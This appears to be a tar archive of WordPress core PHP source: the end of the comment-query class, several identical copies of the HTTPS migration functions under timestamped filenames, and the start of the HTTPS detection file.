if ( empty( $orderby_array ) ) {
$orderby_array[] = "$wpdb->comments.comment_date_gmt $order";
}
// To ensure determinate sorting, always include a comment_ID clause.
if ( ! $found_orderby_comment_id ) {
$comment_id_order = '';
// Inherit order from comment_date or comment_date_gmt, if available.
foreach ( $orderby_array as $orderby_clause ) {
if ( preg_match( '/comment_date(?:_gmt)*\ (ASC|DESC)/', $orderby_clause, $match ) ) {
$comment_id_order = $match[1];
break;
}
}
// If no date-related order is available, use the date from the first available clause.
if ( ! $comment_id_order ) {
foreach ( $orderby_array as $orderby_clause ) {
if ( str_contains( 'ASC', $orderby_clause ) ) {
$comment_id_order = 'ASC';
} else {
$comment_id_order = 'DESC';
}
break;
}
}
// Default to DESC.
if ( ! $comment_id_order ) {
$comment_id_order = 'DESC';
}
$orderby_array[] = "$wpdb->comments.comment_ID $comment_id_order";
}
$orderby = implode( ', ', $orderby_array );
} else {
$orderby = "$wpdb->comments.comment_date_gmt $order";
}
$number = absint( $this->query_vars['number'] );
$offset = absint( $this->query_vars['offset'] );
$paged = absint( $this->query_vars['paged'] );
$limits = '';
if ( ! empty( $number ) ) {
if ( $offset ) {
$limits = 'LIMIT ' . $offset . ',' . $number;
} else {
$limits = 'LIMIT ' . ( $number * ( $paged - 1 ) ) . ',' . $number;
}
}
if ( $this->query_vars['count'] ) {
$fields = 'COUNT(*)';
} else {
$fields = "$wpdb->comments.comment_ID";
}
$post_id = absint( $this->query_vars['post_id'] );
if ( ! empty( $post_id ) ) {
$this->sql_clauses['where']['post_id'] = $wpdb->prepare( 'comment_post_ID = %d', $post_id );
}
// Parse comment IDs for an IN clause.
if ( ! empty( $this->query_vars['comment__in'] ) ) {
$this->sql_clauses['where']['comment__in'] = "$wpdb->comments.comment_ID IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['comment__in'] ) ) . ' )';
}
// Parse comment IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['comment__not_in'] ) ) {
$this->sql_clauses['where']['comment__not_in'] = "$wpdb->comments.comment_ID NOT IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['comment__not_in'] ) ) . ' )';
}
// Parse comment parent IDs for an IN clause.
if ( ! empty( $this->query_vars['parent__in'] ) ) {
$this->sql_clauses['where']['parent__in'] = 'comment_parent IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['parent__in'] ) ) . ' )';
}
// Parse comment parent IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['parent__not_in'] ) ) {
$this->sql_clauses['where']['parent__not_in'] = 'comment_parent NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['parent__not_in'] ) ) . ' )';
}
// Parse comment post IDs for an IN clause.
if ( ! empty( $this->query_vars['post__in'] ) ) {
$this->sql_clauses['where']['post__in'] = 'comment_post_ID IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post__in'] ) ) . ' )';
}
// Parse comment post IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['post__not_in'] ) ) {
$this->sql_clauses['where']['post__not_in'] = 'comment_post_ID NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post__not_in'] ) ) . ' )';
}
if ( '' !== $this->query_vars['author_email'] ) {
$this->sql_clauses['where']['author_email'] = $wpdb->prepare( 'comment_author_email = %s', $this->query_vars['author_email'] );
}
if ( '' !== $this->query_vars['author_url'] ) {
$this->sql_clauses['where']['author_url'] = $wpdb->prepare( 'comment_author_url = %s', $this->query_vars['author_url'] );
}
if ( '' !== $this->query_vars['karma'] ) {
$this->sql_clauses['where']['karma'] = $wpdb->prepare( 'comment_karma = %d', $this->query_vars['karma'] );
}
// Filtering by comment_type: 'type', 'type__in', 'type__not_in'.
$raw_types = array(
'IN' => array_merge( (array) $this->query_vars['type'], (array) $this->query_vars['type__in'] ),
'NOT IN' => (array) $this->query_vars['type__not_in'],
);
// Exclude the 'note' comment type, unless 'all' types or the 'note' type explicitly are requested.
if (
! in_array( 'all', $raw_types['IN'], true ) &&
! in_array( 'note', $raw_types['IN'], true ) &&
! in_array( 'note', $raw_types['NOT IN'], true )
) {
$raw_types['NOT IN'][] = 'note';
}
$comment_types = array();
foreach ( $raw_types as $operator => $_raw_types ) {
$_raw_types = array_unique( $_raw_types );
foreach ( $_raw_types as $type ) {
switch ( $type ) {
// An empty translates to 'all', for backward compatibility.
case '':
case 'all':
break;
case 'comment':
case 'comments':
$comment_types[ $operator ][] = "''";
$comment_types[ $operator ][] = "'comment'";
break;
case 'pings':
$comment_types[ $operator ][] = "'pingback'";
$comment_types[ $operator ][] = "'trackback'";
break;
default:
$comment_types[ $operator ][] = $wpdb->prepare( '%s', $type );
break;
}
}
if ( ! empty( $comment_types[ $operator ] ) ) {
$types_sql = implode( ', ', $comment_types[ $operator ] );
$this->sql_clauses['where'][ 'comment_type__' . strtolower( str_replace( ' ', '_', $operator ) ) ] = "comment_type $operator ($types_sql)";
}
}
$parent = $this->query_vars['parent'];
if ( $this->query_vars['hierarchical'] && ! $parent ) {
$parent = 0;
}
if ( '' !== $parent ) {
$this->sql_clauses['where']['parent'] = $wpdb->prepare( 'comment_parent = %d', $parent );
}
if ( is_array( $this->query_vars['user_id'] ) ) {
$this->sql_clauses['where']['user_id'] = 'user_id IN (' . implode( ',', array_map( 'absint', $this->query_vars['user_id'] ) ) . ')';
} elseif ( '' !== $this->query_vars['user_id'] ) {
$this->sql_clauses['where']['user_id'] = $wpdb->prepare( 'user_id = %d', $this->query_vars['user_id'] );
}
// Falsey search strings are ignored.
if ( isset( $this->query_vars['search'] ) && strlen( $this->query_vars['search'] ) ) {
$search_sql = $this->get_search_sql(
$this->query_vars['search'],
array( 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_author_IP', 'comment_content' )
);
// Strip leading 'AND'.
$this->sql_clauses['where']['search'] = preg_replace( '/^\s*AND\s*/', '', $search_sql );
}
// If any post-related query vars are passed, join the posts table.
$join_posts_table = false;
$plucked = wp_array_slice_assoc( $this->query_vars, array( 'post_author', 'post_name', 'post_parent' ) );
$post_fields = array_filter( $plucked );
if ( ! empty( $post_fields ) ) {
$join_posts_table = true;
foreach ( $post_fields as $field_name => $field_value ) {
// $field_value may be an array.
$esses = array_fill( 0, count( (array) $field_value ), '%s' );
// phpcs:ignore WordPress.DB.PreparedSQLPlaceholders.UnfinishedPrepare
$this->sql_clauses['where'][ $field_name ] = $wpdb->prepare( " {$wpdb->posts}.{$field_name} IN (" . implode( ',', $esses ) . ')', $field_value );
}
}
// 'post_status' and 'post_type' are handled separately, due to the specialized behavior of 'any'.
foreach ( array( 'post_status', 'post_type' ) as $field_name ) {
$q_values = array();
if ( ! empty( $this->query_vars[ $field_name ] ) ) {
$q_values = $this->query_vars[ $field_name ];
if ( ! is_array( $q_values ) ) {
$q_values = explode( ',', $q_values );
}
// 'any' will cause the query var to be ignored.
if ( in_array( 'any', $q_values, true ) || empty( $q_values ) ) {
continue;
}
$join_posts_table = true;
$esses = array_fill( 0, count( $q_values ), '%s' );
// phpcs:ignore WordPress.DB.PreparedSQLPlaceholders.UnfinishedPrepare
$this->sql_clauses['where'][ $field_name ] = $wpdb->prepare( " {$wpdb->posts}.{$field_name} IN (" . implode( ',', $esses ) . ')', $q_values );
}
}
// Comment author IDs for an IN clause.
if ( ! empty( $this->query_vars['author__in'] ) ) {
$this->sql_clauses['where']['author__in'] = 'user_id IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['author__in'] ) ) . ' )';
}
// Comment author IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['author__not_in'] ) ) {
$this->sql_clauses['where']['author__not_in'] = 'user_id NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['author__not_in'] ) ) . ' )';
}
// Post author IDs for an IN clause.
if ( ! empty( $this->query_vars['post_author__in'] ) ) {
$join_posts_table = true;
$this->sql_clauses['where']['post_author__in'] = 'post_author IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post_author__in'] ) ) . ' )';
}
// Post author IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['post_author__not_in'] ) ) {
$join_posts_table = true;
$this->sql_clauses['where']['post_author__not_in'] = 'post_author NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post_author__not_in'] ) ) . ' )';
}
$join = '';
$groupby = '';
if ( $join_posts_table ) {
$join .= "JOIN $wpdb->posts ON $wpdb->posts.ID = $wpdb->comments.comment_post_ID";
}
if ( ! empty( $this->meta_query_clauses ) ) {
$join .= $this->meta_query_clauses['join'];
// Strip leading 'AND'.
$this->sql_clauses['where']['meta_query'] = preg_replace( '/^\s*AND\s*/', '', $this->meta_query_clauses['where'] );
if ( ! $this->query_vars['count'] ) {
$groupby = "{$wpdb->comments}.comment_ID";
}
}
if ( ! empty( $this->query_vars['date_query'] ) && is_array( $this->query_vars['date_query'] ) ) {
$this->date_query = new WP_Date_Query( $this->query_vars['date_query'], 'comment_date' );
// Strip leading 'AND'.
$this->sql_clauses['where']['date_query'] = preg_replace( '/^\s*AND\s*/', '', $this->date_query->get_sql() );
}
$where = implode( ' AND ', $this->sql_clauses['where'] );
$pieces = array( 'fields', 'join', 'where', 'orderby', 'limits', 'groupby' );
/**
* Filters the comment query clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $fields The SELECT clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $where The WHERE clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $limits The LIMIT clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* }
* @param WP_Comment_Query $query Current instance of WP_Comment_Query (passed by reference).
*/
$clauses = apply_filters_ref_array( 'comments_clauses', array( compact( $pieces ), &$this ) );
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$this->filtered_where_clause = $where;
if ( $where ) {
$where = 'WHERE ' . $where;
}
if ( $groupby ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( $orderby ) {
$orderby = "ORDER BY $orderby";
}
$found_rows = '';
if ( ! $this->query_vars['no_found_rows'] ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
$this->sql_clauses['select'] = "SELECT $found_rows $fields";
$this->sql_clauses['from'] = "FROM $wpdb->comments $join";
$this->sql_clauses['groupby'] = $groupby;
$this->sql_clauses['orderby'] = $orderby;
$this->sql_clauses['limits'] = $limits;
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"{$this->sql_clauses['select']}
{$this->sql_clauses['from']}
{$where}
{$this->sql_clauses['groupby']}
{$this->sql_clauses['orderby']}
{$this->sql_clauses['limits']}";
if ( $this->query_vars['count'] ) {
return (int) $wpdb->get_var( $this->request );
} else {
$comment_ids = $wpdb->get_col( $this->request );
return array_map( 'intval', $comment_ids );
}
}
/**
* Populates found_comments and max_num_pages properties for the current
* query if the limit clause was used.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*/
private function set_found_comments() {
global $wpdb;
if ( $this->query_vars['number'] && ! $this->query_vars['no_found_rows'] ) {
/**
* Filters the query used to retrieve found comment count.
*
* @since 4.4.0
*
* @param string $found_comments_query SQL query. Default 'SELECT FOUND_ROWS()'.
* @param WP_Comment_Query $comment_query The `WP_Comment_Query` instance.
*/
$found_comments_query = apply_filters( 'found_comments_query', 'SELECT FOUND_ROWS()', $this );
$this->found_comments = (int) $wpdb->get_var( $found_comments_query );
}
}
/**
* Fetch descendants for located comments.
*
* Instead of calling `get_children()` separately on each child comment, we do a single set of queries to fetch
* the descendant trees for all matched top-level comments.
*
* @since 4.4.0
*
* @param WP_Comment[] $comments Array of top-level comments whose descendants should be filled in.
* @return array
*/
protected function fill_descendants( $comments ) {
$levels = array(
0 => wp_list_pluck( $comments, 'comment_ID' ),
);
$key = md5( serialize( wp_array_slice_assoc( $this->query_vars, array_keys( $this->query_var_defaults ) ) ) );
$last_changed = wp_cache_get_last_changed( 'comment' );
// Fetch an entire level of the descendant tree at a time.
$level = 0;
$exclude_keys = array( 'parent', 'parent__in', 'parent__not_in' );
do {
// Parent-child relationships may be cached. Only query for those that are not.
$child_ids = array();
$uncached_parent_ids = array();
$_parent_ids = $levels[ $level ];
if ( $_parent_ids ) {
$cache_keys = array();
foreach ( $_parent_ids as $parent_id ) {
$cache_keys[ $parent_id ] = "get_comment_child_ids:$parent_id:$key";
}
$cache_data = wp_cache_get_multiple_salted( array_values( $cache_keys ), 'comment-queries', $last_changed );
foreach ( $_parent_ids as $parent_id ) {
$parent_child_ids = $cache_data[ $cache_keys[ $parent_id ] ];
if ( false !== $parent_child_ids ) {
$child_ids = array_merge( $child_ids, $parent_child_ids );
} else {
$uncached_parent_ids[] = $parent_id;
}
}
}
if ( $uncached_parent_ids ) {
// Fetch this level of comments.
$parent_query_args = $this->query_vars;
foreach ( $exclude_keys as $exclude_key ) {
$parent_query_args[ $exclude_key ] = '';
}
$parent_query_args['parent__in'] = $uncached_parent_ids;
$parent_query_args['no_found_rows'] = true;
$parent_query_args['hierarchical'] = false;
$parent_query_args['offset'] = 0;
$parent_query_args['number'] = 0;
$level_comments = get_comments( $parent_query_args );
// Cache parent-child relationships.
$parent_map = array_fill_keys( $uncached_parent_ids, array() );
foreach ( $level_comments as $level_comment ) {
$parent_map[ $level_comment->comment_parent ][] = $level_comment->comment_ID;
$child_ids[] = $level_comment->comment_ID;
}
$data = array();
foreach ( $parent_map as $parent_id => $children ) {
$cache_key = "get_comment_child_ids:$parent_id:$key";
$data[ $cache_key ] = $children;
}
wp_cache_set_multiple_salted( $data, 'comment-queries', $last_changed );
}
++$level;
$levels[ $level ] = $child_ids;
} while ( $child_ids );
// Prime comment caches for non-top-level comments.
$descendant_ids = array();
for ( $i = 1, $c = count( $levels ); $i < $c; $i++ ) {
$descendant_ids = array_merge( $descendant_ids, $levels[ $i ] );
}
_prime_comment_caches( $descendant_ids, $this->query_vars['update_comment_meta_cache'] );
// Assemble a flat array of all comments + descendants.
$all_comments = $comments;
foreach ( $descendant_ids as $descendant_id ) {
$all_comments[] = get_comment( $descendant_id );
}
// If a threaded representation was requested, build the tree.
if ( 'threaded' === $this->query_vars['hierarchical'] ) {
$threaded_comments = array();
$ref = array();
foreach ( $all_comments as $k => $c ) {
$_c = get_comment( $c->comment_ID );
// If the comment isn't in the reference array, it goes in the top level of the thread.
if ( ! isset( $ref[ $c->comment_parent ] ) ) {
$threaded_comments[ $_c->comment_ID ] = $_c;
$ref[ $_c->comment_ID ] = $threaded_comments[ $_c->comment_ID ];
// Otherwise, set it as a child of its parent.
} else {
$ref[ $_c->comment_parent ]->add_child( $_c );
$ref[ $_c->comment_ID ] = $ref[ $_c->comment_parent ]->get_child( $_c->comment_ID );
}
}
// Set the 'populated_children' flag, to ensure additional database queries aren't run.
foreach ( $ref as $_ref ) {
$_ref->populated_children( true );
}
$comments = $threaded_comments;
} else {
$comments = $all_comments;
}
return $comments;
}
/**
* Used internally to generate an SQL string for searching across multiple columns.
*
* @since 3.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $search Search string.
* @param string[] $columns Array of columns to search.
* @return string Search SQL.
*/
protected function get_search_sql( $search, $columns ) {
global $wpdb;
$like = '%' . $wpdb->esc_like( $search ) . '%';
$searches = array();
foreach ( $columns as $column ) {
$searches[] = $wpdb->prepare( "$column LIKE %s", $like );
}
return ' AND (' . implode( ' OR ', $searches ) . ')';
}
/**
* Parse and sanitize 'orderby' keys passed to the comment query.
*
* @since 4.2.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
$allowed_keys = array(
'comment_agent',
'comment_approved',
'comment_author',
'comment_author_email',
'comment_author_IP',
'comment_author_url',
'comment_content',
'comment_date',
'comment_date_gmt',
'comment_ID',
'comment_karma',
'comment_parent',
'comment_post_ID',
'comment_type',
'user_id',
);
if ( ! empty( $this->query_vars['meta_key'] ) ) {
$allowed_keys[] = $this->query_vars['meta_key'];
$allowed_keys[] = 'meta_value';
$allowed_keys[] = 'meta_value_num';
}
$meta_query_clauses = $this->meta_query->get_clauses();
if ( $meta_query_clauses ) {
$allowed_keys = array_merge( $allowed_keys, array_keys( $meta_query_clauses ) );
}
$parsed = false;
if ( $this->query_vars['meta_key'] === $orderby || 'meta_value' === $orderby ) {
$parsed = "$wpdb->commentmeta.meta_value";
} elseif ( 'meta_value_num' === $orderby ) {
$parsed = "$wpdb->commentmeta.meta_value+0";
} elseif ( 'comment__in' === $orderby ) {
$comment__in = implode( ',', array_map( 'absint', $this->query_vars['comment__in'] ) );
$parsed = "FIELD( {$wpdb->comments}.comment_ID, $comment__in )";
} elseif ( in_array( $orderby, $allowed_keys, true ) ) {
if ( isset( $meta_query_clauses[ $orderby ] ) ) {
$meta_clause = $meta_query_clauses[ $orderby ];
$parsed = sprintf( 'CAST(%s.meta_value AS %s)', esc_sql( $meta_clause['alias'] ), esc_sql( $meta_clause['cast'] ) );
} else {
$parsed = "$wpdb->comments.$orderby";
}
}
return $parsed;
}
/**
* Parse an 'order' query variable and cast it to ASC or DESC as necessary.
*
* @since 4.2.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'DESC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
}
https-migration-20260605114228-20260621081205-20260621135617.php 0000666 00000011205 15224151220 0014736 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260607110256.php 0000666 00000011205 15224151220 0011766 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605172929-20260621230001.php 0000666 00000011205 15224151220 0013351 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605104303.php 0000666 00000013341 15224151220 0011750 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
